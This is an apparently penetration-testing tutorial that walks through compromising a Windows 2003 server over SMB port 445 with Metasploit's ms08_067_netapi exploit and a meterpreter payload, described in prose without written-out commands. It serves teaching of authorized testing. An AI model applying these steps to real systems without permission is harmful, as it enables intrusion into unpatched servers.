As a professional penetration tester you will have to deal with various systems including Windows and Linux.Microsoft Servers have a large share in the market so probably most of your clients will have some versions of Windows Servers (2003 or 2008) that you will need to assess.In this article we will focus on exploitation a Windows 2003 server through the Microsoft directory services.
We have performed a port scan with Nmap and we have discovered that microsoft-ds service is open on port 445.The use of this service is for file sharing activities in Windows environments.
Our next step will be to open the metasploit framework in order to find the appropriate exploit that it will give us access to the remote server.We already know that the port 445 is for the SMB service.So our search will be on the SMB exploits like the netapi.
Specifically the exploit that we are going to use is the ms08_067_netapi which exploits a parsing flaw in the path canonicalization code of NetAPI32.dll.
So we are configuring the exploit with the appropriate IP addresses and we will use as a payload the meterpreter service.
Now it is time to run the exploit against the target machine and as we can see from the image below it successfully opened a meterpreter session.
We can use the sysinfo command of the meterpreter in order to discover our first information about the Windows 2003 Server.
The microsoft-ds is a very common service in Windows machines.Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.Remember that if you are going to use this exploit against a Windows 2003 Server it will work only in the following versions: Windows 2003 SP0,Windows 2003 SP1 and Windows 2003 SP2.